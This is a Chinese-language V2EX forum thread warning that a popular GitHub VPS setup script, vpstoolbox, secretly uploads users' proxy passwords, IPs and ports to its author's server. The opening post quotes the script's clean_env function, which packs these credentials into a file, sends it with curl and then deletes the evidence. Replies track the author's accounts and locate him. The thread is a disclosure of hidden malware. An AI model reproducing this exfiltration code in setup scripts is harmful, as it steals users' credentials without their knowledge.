V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
通过以下 Referral 链接购买 DigitalOcean 主机,你将可以帮助 V2EX 持续发展
DigitalOcean - SSD Cloud Servers
proxytoworld
V2EX  ›  VPS

Github 间谍项目 vpstoolbox,避雷,有用的小伙伴记得改密码

  proxytoworld · 340 天前 · 17238 次点击
这是一个创建于 340 天前的主题,其中的信息可能已经有所发展或是发生改变。

仓库:https://github.com/johnrosen1/vpstoolbox/blob/master/vps.sh

会把机场的 IP ,端口,密码上传到作者可控的服务器,后续想干嘛就不知道了

https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494

clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}


第 1 条附言  ·  340 天前
86 条回复    2023-04-05 21:00:46 +08:00
buyan3303
    1
buyan3303  
   340 天前
[机场的 IP ,端口,密码上传到作者可控的服务器]
通常自己免费使用这些机场
proxytoworld
    2
proxytoworld  
OP
   340 天前
@buyan3303 也有可能转卖,谁知道呢
Greenm
    3
Greenm  
   340 天前   ❤️ 1
不管出于什么目的,我已经提交 report 给 github 了。
vsitebon
    4
vsitebon  
   340 天前
太特么溜了
Andim
    5
Andim  
   340 天前 via iPhone
还是 1000 以上的关注项目呀
arfaWong
    6
arfaWong  
   340 天前   ❤️ 2
之前就有人发现发了 issue ,然后作者把 issue 给关了😂
jomalonejia
    7
jomalonejia  
   340 天前
关注后续
csrocks
    8
csrocks  
   340 天前
已经删库了😂
aogg
    9
aogg  
   340 天前
已经打不开 github 项目了
lzgshsj
    10
lzgshsj  
   340 天前   ❤️ 4
不开 issue 的的仓库,多少有点这那毛病
Rache1
    12
Rache1  
   340 天前
在这个 issue 发出来的时候,还有 1.6k star 😄

为什么 trojan 订阅地址包括用户密码等要上传到个人博客? · Issue #138 · johnrosen1/vpstoolbox · GitHub
https://web.archive.org/web/20221128070511/https://github.com/johnrosen1/vpstoolbox/issues/138
vsitebon
    13
vsitebon  
   340 天前
已经删号和删库了
iyiluo
    14
iyiluo  
   340 天前
跑路了,估计好一大波肉鸡
lakehylia
    15
lakehylia  
   340 天前
这是真正的删库跑路吧。。。
vsitebon
    16
vsitebon  
   340 天前   ❤️ 12
leaflxh
    17
leaflxh  
   340 天前
曾经有一次把 get.docker.com 记错了,打成了 get-docker.sh 。用一键脚本感觉像是在裸奔
leaflxh
    18
leaflxh  
   340 天前   ❤️ 2
#!/bin/bash
while [ 1 ]
do
echo " ______________ ______ ___ ________ "
echo " .\\\\ _ _ /----/ /_____/ \\\\\\. /_ "
echo " )__/ /___\\ _/ // / // /___(__ "
echo " / // \\ // / // /_\\ \\ "
echo " /_____\\ /_____\\ _________\\ _______ \\ "
echo " ////////\\_____///////\\\\/////////\\\\///////\\_____//. "
echo " _________ ___________ ________ _______ ________ "
echo " _) /_.) ._ // ___ // /_____\\____ ( "
echo " \\ |__/ \\__ |/ _// / / / X0 / \\ "
echo " \\ : / / \\__ / //_ /\\ /. / \\ "
echo " .\\\\___ /___\\ /_____////____/\\ \\\\__ / "
echo " ////\\____//////\\____/////// ////////\\____////\\____//. "
echo " ///// ///// ///// ///// "
echo ""
echo " WHY YOU NO LOOK AT THE SOURCE BEFORE YOU PIPE INTO BASH??"
echo ""
echo " #AirGap2020 Virtual Conference May 2nd! https://airgapp.in"
echo " Follow @airgappin on Twitter for updates!"
echo ""
done
cookcode
    19
cookcode  
   340 天前 via Android
看了一眼,开发这个的老哥在 v2 也宣传过
wdv2ly
    20
wdv2ly  
   340 天前 via Android
@vsitebon 哈哈,估计作者一看到 v 站小伙伴曝光,立马删库跑路😂
iijboom
    21
iijboom  
   340 天前
https://github.com/laoz77/trojan-gfw-script
这个应该是他的大号
打开可以看到他的网址,建议大家一起一锅端举报了
trojan-gfw-script
This script will help you set up a trojan-gfw server in an extremely fast way. https://www.johnrosen1.com/trojan/ main course Auto install and setup Trojan-Gfw and nginx. Auto enable tcp-bbr and disable tcp slow start
proxytoworld
    22
proxytoworld  
OP
   340 天前
@vsitebon #16 牛逼,这样的开发能封了吗,这脚本还是 root 权限
proxytoworld
    23
proxytoworld  
OP
   340 天前
@arfaWong
@lzgshsj


确实不开 issue 一眼有问题
proxytoworld
    24
proxytoworld  
OP
   340 天前
博客也暂时关了
Death
    25
Death  
   340 天前   ❤️ 2
一键脚本应该尽量默认是有问题的
哪怕是官方提供的安装脚本也要自己过一遍才能放心
iijboom
    26
iijboom  
   340 天前
https://github.com/johnwick3gits/trojan-gfw-script 小号加 1
This branch is 1211 commits ahead of laoz77:master.
下面也有他的信息
Telegram Channel And Group
https://t.me/johnrosen1
https://t.me/trojanscript
中文文檔
FranzKafka95
    27
FranzKafka95  
   340 天前 via Android   ❤️ 1
不开 ISSUE 区其实已经很能说明问题了。
LeegoYih
    28
LeegoYih  
   340 天前   ❤️ 1
@iijboom #26
这么多小号?看来是惯犯了,怕不是灰产。
iijboom
    29
iijboom  
   340 天前
@LeegoYih 估计还有很多,没空找
404www
    30
404www  
   340 天前
哈哈,连博客也删解析了
proxytoworld
    31
proxytoworld  
OP
   340 天前
@LeegoYih #28 有可能是抓下来在卖,如果自己用,这样大批量的也用不着
huoshanhui
    32
huoshanhui  
   340 天前
把这祸害弄进去
mnsw
    33
mnsw  
   340 天前
啊这,以前好像还有群的。
lambdaq
    34
lambdaq  
   340 天前   ❤️ 1
一来可以自己卖赚钱

二来可以怼人举报一波,把线索卖个晶哥简单立个功
XSNARUTO
    35
XSNARUTO  
   340 天前   ❤️ 3
从来不推荐任何小白用什么一件脚本,反正现在便宜机场一大堆,我甚至会觉得随便给小白丢什么「一键脚本」的人都不是什么太负责的人。真的有需求的人,要么会自己搭(毕竟也不难),要么多少懂一点起码的 review 脚本代码。

想起来之前逛 Twitter 看到有小白(而且说了自己不是数码 /科技爱好者)询问数据存储意见,很简单的就买现成云存储的需求,结果也是有人上来就让人家去买 NAS 。我真的无大语,总有人喜欢放个屁,然后跑得无影无踪……。
rock123
    36
rock123  
   340 天前
这个是不是小号? https://github.com/haakuya/Qbit_tools
Greenm
    37
Greenm  
   340 天前   ❤️ 1
https://t.me/vpstoolbox/2 他尝到了甜头,重新搞了个小号打复活赛了
Greenm
    38
Greenm  
   340 天前
https://github.com/ghost 这个账号应该才是他的大号,隐藏了 activity
jenlors
    39
jenlors  
   340 天前   ❤️ 1
这种人就是败类
proxytoworld
    40
proxytoworld  
OP
   340 天前
@Greenm 咋查到大号的,牛啊
AkaGhost
    41
AkaGhost  
   340 天前 via Android   ❤️ 1
ghost 是个特殊用户,代表那个用户已经注销了
xiri
    42
xiri  
   340 天前 via Android
@Greenm ghost 是 github 的删号占位账户,,,
joesonw
    43
joesonw  
   340 天前 via iPhone
域名用了 privacy guardian ,一起去举报 abuse 披露注册信息,不知有没有用。
crab
    44
crab  
   340 天前   ❤️ 1
@arfaWong 提出问题,解决提问人。
jockielee
    45
jockielee  
   340 天前   ❤️ 2
《你用我脚本,我用你代理》🤣
Jeanslike
    46
Jeanslike  
   340 天前
确实是个败类
Cu635
    47
Cu635  
   340 天前
@vsitebon #16
难怪反应这么快,lz 发帖不到 5 个小时就连着帐号一起删了。
BigShot404
    48
BigShot404  
   340 天前
说到这个,现在用 OPENAI ,扫一遍代码然后标注一些疑似账号泄露或者后门地址应该不难吧?
20160409
    49
20160409  
   340 天前
233boy 的这个一键脚本有问题吗,有没人审查过?

https://github.com/233boy/v2ray/wiki
0x535
    50
0x535  
   340 天前   ❤️ 3
580 个 fork 都没发现这个问题 😂 fork 了个寂寞
DeltaC
    51
DeltaC  
   340 天前
致富门路+1
HaneRo
    52
HaneRo  
   340 天前 via Android
rm -rf /root/*.sh ?删除 root 下所有 sh 文件?这是不是不太好
FightPig
    53
FightPig  
   340 天前
删的动作挺快
oszlso
    54
oszlso  
   339 天前   ❤️ 1
作者 @johnrosen1 今日活跃度排名 9187 ,上线咋不吱声呀🤭
boris1993Jr
    55
boris1993Jr  
   339 天前 via iPhone
@0x535 #50 我感觉大部分人都是拿 fork 当收藏用的,因为小白喜欢这么玩,而用一键脚本的又有不少小白
FrankAdler
    56
FrankAdler  
   339 天前   ❤️ 1
https://github.com/Doutianbao/vpstoolbox 相关的 fork 还能找到
n18255447846
    57
n18255447846  
   339 天前   ❤️ 2
事实证明就算有大量使用的人甚至官方的脚本 or 程序,还是有一定的风险。就看懂行的有没有人爆出来了
ttyhtg
    58
ttyhtg  
   339 天前   ❤️ 1
能不能把他扒个底朝天,把他送进去?
levelworm
    59
levelworm  
   339 天前
看了下文中的语气,感觉不太像是大陆人?但是的确又是简体字。

比如这个:操作系统不支援,请使用 Debian 或者 Ubuntu 运行。

像我这种 shell 小白真是大开眼界啊,能学不少东西,希望大家能抓到这个人。
CodeCodeStudy
    60
CodeCodeStudy  
   339 天前
@levelworm 应该是湾湾用简体字,然后搞肉鸡
woyao
    61
woyao  
   339 天前
@livid 恶意的人在 V2EX 做恶
proxytoworld
    62
proxytoworld  
OP
   339 天前
@levelworm #59 合理了
wohccdaa
    63
wohccdaa  
   339 天前 via iPhone
@livid 可以封掉他的账号吗?@johnrosen1
woyao
    64
woyao  
   339 天前
有使用过这些 docker 的人也小心一点吧
https://hub.docker[.]com/r/johnrosen/nzbget/tags
Vindroid
    65
Vindroid  
   339 天前   ❤️ 1
灯下黑,很多人一看是开源的,还那么多星星,那就不看源码,一把梭哈。一键脚本我是从来不敢直接用的
AlphaTauriHonda
    66
AlphaTauriHonda  
   339 天前 via iPhone
实在是离谱。
是🧱难以封光代理所以主动发布间谍项目?
还是 johnrosen1 想倒卖代理获利?
jklove123bai
    67
jklove123bai  
   339 天前
所以那些相信开源没事的人的逻辑,我很难理解
lxiian
    68
lxiian  
   339 天前 via iPhone
@levelworm 湾湾喜欢用"支援"而不是"支持"
woyao
    69
woyao  
   339 天前
@CodeCodeStudy 应该不是湾湾
他的域名 jiesen[.]life 和 johnrosen1[.]com ,看了一下解析 IP ,有不少上海电信的 IP 。应该是在上海。
ICU
    70
ICU  
   339 天前
哈哈 楼主这个发现,还上了这里的新闻( https://www.oschina.net/news/234764
woyao
    71
woyao  
   339 天前
不是湾湾的证据还可以看这篇文章

Ledger Nano X 开箱记录及上手体验
https://johnrosen1[.]com/2021/06/02/ledger/
leeuu
    72
leeuu  
   339 天前 via iPhone
开盒了
Shura
    73
Shura  
   339 天前
真是败类,没有人品
levelworm
    74
levelworm  
   339 天前 via Android
@lxiian 看 69 楼,也不好确定了。另外注释里其他的中文看起来又比较像大陆这边的,不知道坛贤们能不能挖出来更多的。
lovedebug
    76
lovedebug  
   339 天前
繁体字“支援”默认不会翻译成“支持”
mypchas6fans
    77
mypchas6fans  
   339 天前
@20160409 之前说有挖矿传言,但我一直在用,只能说看上去没问题,vps cpu 内存流量都正常
Jakarta
    78
Jakarta  
   338 天前 via Android
我感觉像是居住在大陆的台湾人。
Jakarta
    79
Jakarta  
   338 天前 via Android
johnrosen.xyz 也是他的,还搭建了邮件服务器,邮箱是 john 艾特 johnrosen.xyz
kebamt
    80
kebamt  
   338 天前 via iPhone
@mypchas6fans 没出现过问题,都正常,只是脚本会自动给你做决定服务器层面屏蔽掉一些网站,如:大纪元😂
mcone
    81
mcone  
   337 天前
前两天看到帖子,这两天无聊搜下了,跟楼上某位朋友的结论有点像,应该是个肉身在大陆的台湾人或者被港台语法深刻浸染过的大陆人。
love2wind
    82
love2wind  
   337 天前
慎用一键脚本啊,谁知道有没有夹带私货
luoshengdu
    83
luoshengdu  
   336 天前
我擦,我用了好多年了啊
mypchas6fans
    84
mypchas6fans  
   336 天前
@kebamt 嗯,这个看生成的 config.json 就知道,有必要。
zlhsvc
    85
zlhsvc  
   336 天前
还真没有去翻一键脚本的习惯,下次看来得多注意了
zzyphp111
    86
zzyphp111  
   333 天前   ❤️ 1
@20160409 #49 看下油管有 up 曝光 这个 233boy ,几年前给 zf 部署,用过还行。

[科学上网] 233boy 版 v2ray 到底有没有后门?看完视频你就知道答案了
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   3385 人在线   最高记录 6543   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 28ms · UTC 11:38 · PVG 19:38 · LAX 03:38 · JFK 06:38
Developed with CodeLauncher
♥ Do have faith in what you're doing.